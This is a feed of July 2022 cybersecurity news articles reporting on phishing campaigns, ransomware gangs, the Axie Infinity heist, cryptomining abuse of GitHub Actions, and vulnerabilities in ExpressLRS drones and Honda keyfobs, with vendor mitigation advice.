Cyber Security News

Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021

Security Affairs - Wed, 07/13/2022 - 01:56
A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations

Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user’s sign-in session, and bypass the authentication process even when the victim has enabled the MFA.

In AiTM phishing, threat actors set up a proxy server between a target user and the website the user wishes to visit, which is the phishing site under the control of the attackers. The proxy server allows attackers to access the traffic and capture the target’s password and the session cookie. 

Once obtained the credentials and session cookies to access users’ mailboxes, threat actors launched business email compromise (BEC) campaigns against other targets. Microsoft experts believe that the AiTM phishing campaign was used to target more than 10,000 organizations since September 2021.

The landing pages used in this campaign were designed to target Office 365 authentication process by posing as the Office online authentication page. Microsoft researchers noticed that the operators behind this campaign use the Evilginx2 phishing kit as their AiTM infrastructure.

In some of the attacks observed by the experts, threat actors used phishing emails with an HTML file attachment. In order to trick victims into opening the attachment, the message informed the recipients that they had a voice message.

“This redirector acted as a gatekeeper to ensure the target user was coming from the original HTML attachment. To do this, it first validated if the expected fragment value in the URL—in this case, the user’s email address encoded in Base64—exists. If the said value existed, this page concatenated the value on the phishing site’s landing page, which was also encoded in Base64 and saved in the “link” variable” reads the analysis published by Microsoft. “By combining the two values, the succeeding phishing landing page automatically filled out the sign-in page with the user’s email address, thus enhancing its social engineering lure. This technique was also the campaign’s attempt to prevent conventional anti-phishing solutions from directly accessing phishing URLs.”

Once the attackers have captured the session cookie, they have injected it into their browser to skip the authentication process, even if the recipient enabled the MFA for his account. 

Microsoft recommends organization to adopt MFA implementation “phish-resistant” by using solutions that support Fast ID Online (FIDO) v2.0 and certificate-based authentication.

Microsoft also recommends enabling conditional access policies every time an attacker attempts to use a stolen session cookie, and monitoring for suspicious or anomalous activities, such as sign-in attempts with suspicious characteristics and unusual mailbox activities.

“This AiTM phishing campaign is another example of how threats continue to evolve in response to the security measures and policies organizations put in place to defend themselves against potential attacks.” concludes the report. “While AiTM phishing attempts to circumvent MFA, it’s important to underscore that MFA implementation remains an essential pillar in identity security. MFA is still very effective at stopping a wide variety of threats; its effectiveness is why AiTM phishing emerged in the first place.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, AiTM phishing)

The post Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021 appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout

The Hacker News - Wed, 07/13/2022 - 00:15
Microsoft released its monthly round of Patch Tuesday updates to address 84 new security flaws spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild. Of the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are two other bugs in the Chromium-based Edge browser, one
Categories: Cyber Security News

The President of European Central Bank Christine Lagarde targeted by hackers

Security Affairs - Tue, 07/12/2022 - 18:07
Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt.

The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt.

The European Central Bank revealed that the hacking attempt took place recently, but the good news it that its experts were able to detect and halt it.

“The attempt took place “recently,” the Frankfurt-based central bank for the 19 countries that use the euro said in an emailed response to a query about a report by Business Insider.” reported the Associated Press. “The bank added that “it was identified and halted quickly” but that it had nothing more to say amid an investigation.”

According to Business Insider, threat actors attempted to hack Lagarde’s mobile device by sending her a text message from what appeared to be former German Chancellor Angela Merkel’s cellphone number. The message sent to the ECB told Lagarde that Merkel wanted to communicate with her by WhatsApp, which is considered a more secure channel.

The attack failed because Lagarde was suspicious of the message and contacted Merkel by phone. The threat actors were interested in taking over the accounts of various prominent figures on various messaging services, including WhatsApp.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, ECB)

The post The President of European Central Bank Christine Lagarde targeted by hackers appeared first on Security Affairs.

Categories: Cyber Security News

Flaws in the ExpressLRS Protocol allow the takeover of drones

Security Affairs - Tue, 07/12/2022 - 11:25
The protocol for radio-controlled (RC) drones, named ExpressLRS, is affected by vulnerabilities that can allow device takeover.

Researchers warn of vulnerabilities that affect the protocol for radio-controlled (RC) drones, named ExpressLRS, which can be exploited to take over unmanned vehicles.

ExpressLRS is a high-performance open-source radio control link that provides a low latency radio control link while also achieving maximum range.

According to a bulletin recently published, an attacker can take control of any receiver by observing the traffic from the associated transmitter.

Using only a standard ExpressLRS compatible transmitter, it is possible to take control of any receiver after observing traffic from a corresponding transmitter.

Security issues in the binding phase can allow an attacker to extract part of the identifier shared between the receiver and transmitter. The analysis of this part, along with brute force attack, can allow attackers to discover the remaining part of the identifier. Once the attacker has obtained the complete identifier, it can take over the craft containing the receiver, with no knowledge of the binding phrase, by using a transmitter. This attack scenario is feasible in software using standard ExpressLRS compatible hardware.

“ExpressLRS uses a ‘binding phrase’, built into the firmware at compile time to bind a transmitter to a receiver. ExpressLRS states that the binding phrase is not for security, it is anti-collision.” reads a bulletin published by NccGroup. “Due to weaknesses related to the binding phase, it is possible to extract part of the identifier shared between the receiver and transmitter. A combination of analysis and brute force can be utilised to determine the remaining portion of the identifier. Once the full identifier is discovered, it is then possible to use an attacker’s transmitter to control the craft containing the receiver with no knowledge of the binding phrase. This is possible entirely in software using standard ExpressLRS compatible hardware.”

The phrase used by the ExpressLRS protocol is encrypted using the hashing algorithm MD5 which is known to be cryptographically broken.

The experts observed that the “sync packets” that are exchanged between transmitter and receiver at regular intervals for synchronizing purposes leak a major part of the binding phrase’s unique identifier (UID). An attacker can determine the remaining part via brute-force attacks or by observing packets over the air without brute-forcing the sequences.

“Three weaknesses were identified, which allow for the discovery of the four bytes of the required UID to take control of the link. Two of these issues relate to the contents of the sync packet.

  1. The sync packet contains the final three bytes of the UID. These bytes are used to verify that the transmitter has the same binding phrase as the receiver, to avoid collision. Observation of a single sync packet therefor gives 75% of the bytes required to take over the link.
  2. The CRC initialiser uses the final two bytes of the UID sent with the sync packet, making it extremely easy to create a CRC check.” reads the advisory.

The third weakness occurs in the FHSS sequence generation.

  1. Due to weaknesses in the random number generator, the second 128 values of the final byte of the 4 byte seed produce the same FHSS sequence as the first 128.

The advisory recommends avoiding sending the UID over the control link. The data used to generate the FHSS sequence should not be sent over the air. It also recommends to improve the random number generator by using a more secure algorithm or adjusting the existing algorithm to work around repeated sequences.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, drones)

The post Flaws in the ExpressLRS Protocol allow the takeover of drones appeared first on Security Affairs.

Categories: Cyber Security News

TikTok Postpones Privacy Policy Update in Europe After Italy Warns of GDPR Breach

The Hacker News - Tue, 07/12/2022 - 09:04
Popular video-sharing platform TikTok on Tuesday agreed to pause a controversial privacy policy update that could have allowed it to serve targeted ads based on users' activity on the social video platform without their permission to do so. The reversal, reported by TechCrunch, comes a day after the Italian data protection authority — the Garante per la Protezione dei Dati Personali — warned the
Categories: Cyber Security News

Avoiding Death by a Thousand Scripts: Using Automated Content Security Policies

The Hacker News - Tue, 07/12/2022 - 07:28
Businesses know they need to secure their client-side scripts. Content security policies (CSPs) are a great way to do that. But CSPs are cumbersome. One mistake and you have a potentially significant client-side security gap. Finding those gaps means long and tedious hours (or days) in manual code reviews through thousands of lines of script on your web applications. Automated content security
Categories: Cyber Security News

Microsoft announced the general availability of Windows Autopatch feature

Security Affairs - Tue, 07/12/2022 - 05:21
Microsoft announced the general availability of a feature called Autopatch that automatically updates Windows and Office software.

Microsoft announced the general availability of a service called Autopatch that automates the process of managing and rolling out updates to Windows and Office software. The feature is available for Windows Enterprise E3 and E5 licenses, but Windows Education (A3) or Windows Front Line Worker (F3) licenses are not covered.

Microsoft initially announced the implementation of the new feature in March 2022 that aims at keeping its systems up-to-date. The move aims at improving the patch management process in enterprises that could be exposed to cyber-attacks in case they fail in installing the available patch and upgrades.

Microsoft announced that it will continue to roll out Partch Tuesday security updates and Autopatch will help “streamline updating operations and create new opportunities for IT pros.”

A robust update process leverages update deployment rings. The Windows Autopatch feature works dynamically creating 4 testing rings, each of them representative of all the diversity in an enterprise. The updates are initially tested on a small set of devices, then if the installation creates no problems, the installation is extended to increasingly larger sets, with an evaluation period at each progression.

“The ‘test ring’ contains a minimum number of representative devices. The ‘first’ ring is slightly larger, containing about 1% of all devices under management. The ‘fast’ ring contains about 9% of endpoints, with the rest assigned to the ‘broad’ ring.” continues the announcement.

“Windows Autopatch aims to keep at least 95% of eligible devices on the latest Windows quality update 21 days after release,” states Microsoft. “When running an expedited release, the regular goal […] no longer applies. Instead, Windows Autopatch greatly accelerates the release schedule of the release to update the environment more quickly.”

Microsoft also published a FAQ page and documentation that provide additional information on how Windows Autopatch.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft autopatch)

The post Microsoft announced the general availability of Windows Autopatch feature appeared first on Security Affairs.

Categories: Cyber Security News

Cloud-Based Cryptocurrency mining attacks abuse GitHub Actions and Azure VM

Security Affairs - Tue, 07/12/2022 - 03:26
Researchers investigated cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs.

Researchers from Trend Micro published a report that details cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs and the threat actors behind them.

Threat actors are attempting to compromise a large number of cloud-based systems to mine cryptocurrency with a significant impact on target organizations in terms of resource consumption and cost.

To demonstrate the impact on the organizations, Trend Micro researchers deployed the monero miner XMRig on one of its systems and observed an increase in CPU utilization rate from an average of 13% to 100%. This means that the cost of electricity to the target organization jumped from US$20 up to US$130 per month (+600%) for a single cloud instance. Considering that organizations usually control multiple cloud instances, the economic impact on them dramatically increases.

Experts pointed out that the performance of an infrastructure infected with a miner slows down and can cause the disruption of the online services of a business, impacting the reputation of the organization.

“Cryptocurrency-mining groups enter cloud deployments through similar methods, typically through the exploitation of a security flaw within target systems, such as an unpatched vulnerability, weak credentials, or a misconfigured cloud implementation.” states the report published by Trend Micro. “However, each group more or less has its unique traits, from its skill level and experience to the tools and techniques it uses, that set it apart from other groups.”

For example, the Outlaw threat actors, which has been active since at least 2018, uses brute force and SSH exploit (exploit Shellshock Flaw and Drupalgeddon2 vulnerability) to achieve remote access to the target systems, including server and IoT devices. The main component of this malware implant is a variant of “Shellbot”, a Monero miner bundled with a Perl-based backdoor, which includes an IRC-based bot and an SSH scanner. 

Another group, tracked as TeamTNT, attempts to compromise hosts via the exploitation of vulnerable software services, then it steals credentials for other services to move to other hosts. In November, Trend Micro researchers reported that TeamTNT hackers were targeting poorly configured Docker servers exposing Docker REST APIs as part of an ongoing campaign that started in October.

Threat actors were executing malicious scripts to deploy Monero cryptocurrency miners, perform container-to-host escape using well-known techniques, and scan the Internet for exposed ports from other compromised containers.

In its latest article, Trend Micro detailed how attackers are leveraging GitHub Actions (GHAs) and Azure virtual machines (VMs) for cloud-based cryptocurrency mining. The experts observed threat actors abusing the runners or servers provided by GitHub to run an organization’s pipelines and automation by maliciously downloading and installing their miners. We also analyze different GHA YAML scripts found on GitHub that tried to mine all kinds of cryptocurrency by using the GHA runners.

GHA allows users to automate the software build, test, and deployment pipeline.

The experts pointed out that Linux and Windows runners are hosted on Standard_DS2_v2 virtual machines on Azure and come with two vCPUs and 7GB of memory.

The experts have identified over a thousand repositories and more than 550 code samples that are abusing GitHub Actions as a part of a cryptocurrency mining campaign leveraging GitHub runners.

“For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry. Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions.” reads the report. “Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions. “

The report also provides recommendations on how to detect cryptocurrency miners along with indicators of compromise for known cryptocurrency mining campaigns.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, cryptocurrency mining)

The post Cloud-Based Cryptocurrency mining attacks abuse GitHub Actions and Azure VM appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft Windows Autopatch is Now Generally Available for Enterprise Systems

The Hacker News - Tue, 07/12/2022 - 01:33
Microsoft on Monday announced the general availability of a feature called Autopatch that automatically keeps Windows and Office software up-to-date on enrolled endpoints. The launch, which comes a day before Microsoft is expected to release its monthly round of security patches, is available for customers with Windows Enterprise E3 and E5 licenses. It, however, doesn't support Windows Education
Categories: Cyber Security News

Cloud-based Cryptocurrency Miners Targeting GitHub Actions and Azure VMs

The Hacker News - Mon, 07/11/2022 - 13:13
GitHub Actions and Azure virtual machines (VMs) are being leveraged for cloud-based cryptocurrency mining, indicating sustained attempts on the part of malicious actors to target cloud resources for illicit purposes. "Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency
Categories: Cyber Security News

A fake job offer via LinkedIn allowed to steal $540M from Axie Infinity

Security Affairs - Mon, 07/11/2022 - 10:42
Threat actors used a fake job offer on LinkedIn to target an employee at Axie Infinity that resulted in the theft of $540 Million.

In March, threat actors stole almost $625 million in Ethereum and USDC (a U.S. dollar pegged stablecoin) tokens from Axie Infinity’s Ronin network bridge. The attack took place on March 23rd, but the cyber heist was discovered after a user was unable to withdraw 5,000 ether.

The Ronin Network is an Ethereum-linked sidechain used for the blockchain game Axie Infinity.

The attackers have stolen roughly 173,600 ether and 25.5 million USDC. The Ronin bridge and Katana Dex have been halted following the attack.

Axie Infinity disclosed the security breach through the official Discord and Twitter accounts, and by Ronin Network.

Now a report from The Block citing two people familiar with the matter revealed that threat actors targeted a senior engineer at the company with a fake job offer via LinkedIn.

“According to two people with direct knowledge of the matter, who were granted anonymity due to the sensitive nature of the incident, a senior engineer at Axie Infinity was duped into applying for a job at a company that, in reality, did not exist.” reads the report published by The Block. “Earlier this year, staff at Axie Infinity developer Sky Mavis were approached by people purporting to represent the fake company and encouraged to apply for jobs, according to the people familiar with the matter. One source added that the approaches were made through the professional networking site LinkedIn.”

The attackers offered a job with an extremely generous compensation package to a Sky Mavis engineer.

A PDF containing the offer was sent to the employee, once opened the file a spyware compromised his system and infiltrate the Ronin’s network. Once inside the company infrastructure, the threat actors were able to take over four out of nine validators on the Ronin network.

“Employees are under constant advanced spear-phishing attacks on various social channels and one employee was compromised. This employee no longer works at Sky Mavis. The attacker managed to leverage that access to penetrate Sky Mavis IT infrastructure and gain access to the validator nodes.” reads a post-mortem analysis published by Sky Mavis.

In April, the U.S. government blamed North Korea-linked APT Lazarus for the Ronin Validator cyber heist.

The U.S. Treasury announced in a notice the sanctions against the Ethereum address used by the North Korea-linked APT to receive the stolen funds. US organizations are forbidden to conduct any transactions with the above address.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Zyxel)

The post A fake job offer via LinkedIn allowed to steal $540M from Axie Infinity appeared first on Security Affairs.

Categories: Cyber Security News

What It Takes to Tackle Your SaaS Security

The Hacker News - Mon, 07/11/2022 - 08:29
It's not a new concept that Office 365, Salesforce, Slack, Google Workspace or Zoom, etc., are amazing for enabling the hybrid workforce and hyper-productivity in businesses today. However, there are three main challenges that have arisen stemming from this evolution: (1) While SaaS apps include a host of native security settings, they need to be hardened by the security team of the organization
Categories: Cyber Security News

Anubis Networks is back with new C2 server

Security Affairs - Mon, 07/11/2022 - 06:42
A large-scale phishing campaign leveraging the Anubis Network is targeting Brazil and Portugal since March 2022.

A large-scale phishing campaign is targeting Internet-end users in Brazil and Portugal since March 2022. Anubis Network is a C2 portal developed to control fake portals and aims to steal credentials to fully access the real systems.

This C2 server is controlled by a group of operators that come from the previous analysis in 2022, the various brands being divided among the operators of the group (in a call center modus operandi).

This campaign is highlighted by Segurança Informática in 2020, and the high-level diagram of this new campaign can be observed below.

Figure 1: High-level diagram of the ANUBIS phishing network and its components (2020).

In detail, this fresh campaign is composed of three crucial operating components:

  • the delivery vehicle to propagate the landing page in the wild; usually carried out through smishing (SMS) and phishing (email)
  • a malicious landing page hosted on a cloud server, composed of a user interface and layout very similar to the real system
  • an operation back-end that allows criminals to manage the details of users who have fallen into the trap.

Figure 2 presents an example of an SMS sent to Internet end-users during the ANUBIS social engineering wave. The image is related to an ongoing campaign in Portugal impersonating a specific organization to steal banking credentials.

Figure 2: Example of SMS sent during the social engineering wave.

SMSs are sent based on a list created by the C2 owner, namely: 1kk-rusha-01.txt.

Fake domains hosted automatically on Cloudflare CDN

The ANUBIS network phishing campaigns are masked through the Cloudflare CDN. Operators can easily make this configuration through an interface that uses the CloudFlare API for configuring new DNS zones.

Figure 3: Feature of adding new domains and configuring them behind the Cloudflare CDN via the ANUBIS back office portal.

The Phishing template

One of the last campaigns disseminated by criminals is impersonating a popular service in Portugal with the goal of stealing credentials of home banking portals.

After clicking on the link distributed via smishing, the victims are redirected to a specific landing page that collects the mobile phone number and the associated code (PIN). As observed, criminals are using the Let’s Encrypt CA to create valid HTTPs certificates.


Figure 4:
 Phishing template of ANUBIS Network campaign.

After clicking on “CONTINUAR“, a new page is presented. Additional data from the victim are requested by the server-side and added to session cookies.

Figure 5: Additional details about the victims are stored on the session cookies.

As observed, 12 target banks operating in Portugal are listed in this specific campaign.

Figure 6: Target banks present on the Anubis Network campaign in Portugal.

In the next step, credentials to access the target portals are requested.

Figure 7: Credentials to access the real systems are requested.

Additional details related to credit cards are also requested by criminals. A specific loading page is then presented, and ANUBIS operators can request other details via the C2 portal in a call center modus operandi.

Figure 8: Additional information requested by criminals.

Anubis Network C2 Panel

By analyzing the landing page source code, the URL of the C2 server can be obtained.

Figure 9: Endpoint of the Anubis Network C2 server present on the source code.

As observed, the C2 login page is linked to a legitimate system in order to confuse threat analysts.

Figure 10: Login page of Anubis Network C2 server.

The features observed inside the C2 server are very similar to the analysis performed in 2020. Operators can control all the infection flow by requesting additional details and accessing the real system in the background.

Figure 10: Internal pages where Anubis Network operators can control all the malicious flow.

In detail, global administrators are capable of adding users to specific target organizations as observed below.

Figure 11: Anubis Network operators and permissions page with the target organizations.

According to the MySQL database that supports the system, there are 77 operators in the system – which represents the business and operational volume of this malicious scheme.

An interesting feature also implemented in this new version of the C2 portal is the email temp. By using this feature, criminals can create new domains and use internal emails to manage all the processes.

Figure 12: Anubis Network email temp feature.

The landing pages presented to the victims and specific data can be configured on the Anubis Network administrative portal. The path of the folder and the target brand can be observed on this specific page.

Figure 13: Target organizations of Anubis Network C2 server – Jully 2022.

Since the malicious network is made up of many people, a channel on Telegram was created in order to provide technical support to operators in the performance of their duties.

Figure 14: Telegram channel created as a technical support channel.

The MySQL database

The heart of the ANUBIS network is a MySQL database. This database is used for data synchronization between all components of the malicious ecosystem and maintains everything up-to-date each second.

Figure 15: Database schema of the ANUBIS phishing network.

Additional details, including final thoughts and Indicators of Compromise (IoCs) are available in the original analysis published by the Pedro Tavares

https://seguranca-informatica.pt/anubis-networks-is-back-with-new-c2-server/#.Ysv53XZBy5d

About the author: Pedro Tavarez

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca–informatica.pt.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Anubis)

The post Anubis Networks is back with new C2 server appeared first on Security Affairs.

Categories: Cyber Security News

BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands

Security Affairs - Mon, 07/11/2022 - 05:27
BlackCat (aka ALPHV) Ransomware gang introduced an advanced search by stolen victim’s passwords, and confidential documents.

The notorious cybercriminal syndicate BlackCat competes with Conti and Lockbit 3.0. They introduced an advanced search by stolen victim’s passwords, and confidential documents leaked in the TOR network

Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the value of ransom demand requests by the notorious Blackcat ransomware gang. According to experts, the notorious cybercriminal syndicate actively competes with Conti and the updated Lockbit 3.0, and recently introduced a search by stolen victim’s passwords, and confidential documents leaked in the TOR network.

Based on the observed recently compromised victims based in the Nordics region (which haven’t been disclosed by the group yet) the amount to be paid exceeds $2 million. One of the tactics used offers close to 50% discount to the victim in the case they are willing to pay – several ransom demands valued at $14 million were decreased to $7 million, but such amounts are still complicated for enterprises facing cybersecurity incidents. The most common ransom demand practiced by BlackCat jumped up to $2.5 million and it seems its trajectory will only grow.

The average ransomware payment climbed 82% since 2020 to a record high of $570,000 in the first half of 2021, and then by 2022 it almost doubled. The latest forecast is for global ransomware extortion activity to reach $265 billion by 2031, with total damages for businesses valued at $10,5 trillion globally. These metrics indicate ransomware to be the worlds largest “shadow economy”, generating expense damages more than natural disasters.

BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport. The group is targeting high-profile businesses in critical industries including energy, financial institutions, legal services, and technology.

Blackcat ransomware is one of the fastest-growing Ransomware-as-a-Service (RaaS) underground groups practicing so called “quadruple extortion” by pressing victims to pay – leveraging encryption, data theft, denial of service (DoS) and harassment.

The BlackCat is also known as “ALPHV”, or “AlphaVM” and “AphaV”, a ransomware family created in the Rust programming language. The group’s leader with identical alias in communications on Dark Web forums outlined Rust as one of the competitive advantages of their locker compared to Lockbit and Conti. Despite the fact Blackcat and Alpha have completely different URLs in TOR Network, the scripting scenarios used on their pages are identical, and likely developed by the same actors. Both projects are using an advanced set of JS-based obfuscation to protect the page from analysis managed by 3 scripts written in the same way. 

The group was the pioneer of search in the indexed stolen data – allowing customers and employees of the affected companies to check exposed data.

Such approach is used as one of the catalysts for further class-action lawsuits which could be filed by unhappy individuals who will see their data or communications affected due to lack of information security caused by data breaches. In a recent post from 10 Jul 2022, 15:35 pm in Dark Web, “ALPHV” introduced search not only by text signatures, but also supporting tags for search of passwords and compromised PII. It seems that some of the stolen files are still under indexing, but majority is already available for quick navigation. There were over 2,270 indexed documents identified containing access credentials and password information in plaintext, and over 100,000 documents containing confidential marking, including indexed e-mail communications and sensitive attachments.

ALPHV seems to be significantly competing with Lockbit 3.0 and Conti – another actively developing ransomware syndicates who called ALPHV “scammers”. Likely, the statement is related to some conflict and issues between affiliates and team members who could be associated with both projects at different stages. 

ALPHV has been associated with two other ransomware groups: DarkSide and BlackMatter. Design overlaps between ALPHV and DarkSide have prompted rumors that ALPHV was a rebrand of DarkSide. On underground cybercriminal forums, the representative of the “LockBit” ransomware also initiated threads stating that ALPHV was a rebrand of DarkSide and BlackMatter RaaS programs. While ALPHV denied being a rebrand of DarkSide or BlackMatter, developers and money launderers from ALPHV are linked to DarkSide/BlackMatter, according to the FBI. Therefore, while ALPHV may not be a rebrand, it is likely that the group recruited many members from these now inactive ransomware gangs.

Today the group published new victims – “COUNT+CARE” Gmbh (an information technology and services company from Germany), following Dusit D2 Kenz Hotel in Dubai, Sinclair Wilson (an accounting and wealth management services firm from Australia) and Adler Display out of Baltimore, Maryland.

Additional info is available in the post published by Resecurity on its blog:

https://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, BlackCat)

The post BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands appeared first on Security Affairs.

Categories: Cyber Security News

Experts warn of the new 0mega ransomware operation

Security Affairs - Mon, 07/11/2022 - 03:50
BleepingComputer reported a new ransomware operation named 0mega that is targeting organizations worldwide.

0mega is a new ransomware operation that is targeting organizations worldwide using a double-extortion model, BleepingComputer reported.

The ransomware operation has been active at least since May 2022 and already claimed to have breached multiple organizations.

Victims of the ransomware reported that the malware adds the .0mega extension to the encrypted file’s names and creates for each victim a customized ransom note named DECRYPT-FILES.txt.

The operators behind this ransomware is some cases included in the ransom note details on how to disclose the attack to business partners and trade associations in case the victim will not pay the ransom.

Source https://id-ransomware.blogspot.com/2022/05/0mega-ransomware.html

Like other ransomware gangs, the operators use a payment negotiation site hosted on the Tor network.

Victims can contact the operators via the negotiation site by uploading the ransom note dropped on their systems, obviously the note includes a unique identifier.

The researchers Andrew Ivanov, who worked with Lawrence Abrams, published a blog post that includes details about the ransomware.

A new article in my Digest #0mega #Ransomware https://t.co/UoAs0M9mba
Extension: .0mega
R/n: DECRYPT-FILES.txt
Sample ransom note and exe-file not yet found. pic.twitter.com/xQs34oKPAy

— Amigo-A (@Amigo_A_) July 9, 2022

BleepingComputer confirmed that at the time of their report, the researchers have yet to find a 0mega sample.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Experts warn of the new 0mega ransomware operation appeared first on Security Affairs.

Categories: Cyber Security News

Hackers Used Fake Job Offer to Hack and Steal $540 Million from Axie Infinity

The Hacker News - Mon, 07/11/2022 - 02:43
The $540 million hack of Axie Infinity's Ronin Bridge in late March 2022 was the consequence of one of its former employees getting tricked by a fraudulent job offer on LinkedIn, it has emerged.  According to a report from The Block published last week citing two people familiar with the matter, a senior engineer at the company was duped into applying for a job at a non-existent company, causing
Categories: Cyber Security News

PyPI Repository Makes 2FA Security Mandatory for Critical Python Projects

The Hacker News - Mon, 07/11/2022 - 01:23
The maintainers of the official third-party software repository for Python have begun imposing a new two-factor authentication (2FA) condition for projects deemed "critical." "We've begun rolling out a 2FA requirement: soon, maintainers of critical projects must have 2FA enabled to publish, update, or modify them," Python Package Index (PyPI) said in a tweet last week. "Any maintainer of a
Categories: Cyber Security News

Experts demonstrate how to unlock several Honda models via Rolling-PWN attack

Security Affairs - Sun, 07/10/2022 - 13:40
Bad news for the owners of several Honda models, the Rolling-PWN Attack vulnerability can allow unlocking their vehicles.

A team of security Researchers Kevin2600 and Wesley Li from Star-V Lab independently discovered a flaw in Honda models, named the Rolling-PWN Attack vulnerability (CVE-2021-46145), that can allow unlocking their vehicles-

A remote keyless entry system (RKE) allows remotely unlocking or starting a vehicle. The researchers tested a remote keyless entry system (RKE) that allows to remotely unlock or start a vehicle and discovered the Rolling-PWN attack issue. According to the experts, the issue affects all Honda vehicles on the market (From the Year 2012 up to the Year 2022).

Ladies and gentlemen, it is my honor to presenting you the Rolling-Pwn attack research on Honda Keyfob system. (https://t.co/UqJEJofxtr) pic.twitter.com/3ZccqfJrUa

— Kevin2600 (@Kevin2600) July 7, 2022

Successful exploitation of this flaw can allow attackers to permanently open the car door or even start the engine of a vehicle.

The issue resides in a version of the rolling codes mechanism implemented in many Honda models to prevent replay attacks.

“We found it in a vulnerable version of the rolling codes mechanism, which is implemented in huge amounts of Honda vehicles. A rolling code system in keyless entry systems is to prevent replay attack. After each keyfob button pressed the rolling codes synchronizing counter is increased. However, the vehicle receiver will accept a sliding window of codes, to avoid accidental key pressed by design.” reads the description of the Rolling Pwn Attack published on GitHub. “By sending the commands in a consecutive sequence to the Honda vehicles, it will be resynchronizing the counter. Once counter resynced, commands from the previous cycle of the counter worked again. Therefore, those commands can be used later to unlock the car at will.”

The experts successfully tested the attack against 10 most popular models of Honda vehicles from the Year 2012 up to the Year 2022, including:

  · Honda Civic 2012
  · Honda X-RV 2018
  · Honda C-RV 2020
  · Honda Accord 2020
  · Honda Odyssey 2020
  · Honda Inspire 2021
  · Honda Fit 2022
  · Honda Civic 2022
  · Honda VE-1 2022
  · Honda Breeze 2022

The researchers also published a set of PoC videos, below is an attack against a Honda CRV:

The researchers pointed out that there is no possibility to discover if someone has exploited the flaw against a model because the exploitation does not leave any traces in traditional log files.

How to fix the issue?

“The common solution requires us to bring the vehicle back to a local dealership as a recall. But the recommended mitigation strategy is to upgrade the vulnerable BCM firmware through Over-the-Air (OTA) Updates if feasible. However, some old vehicles may not support OTA.” the experts recommended.

Follow me on Twitter: @securityaffairs and Facebook

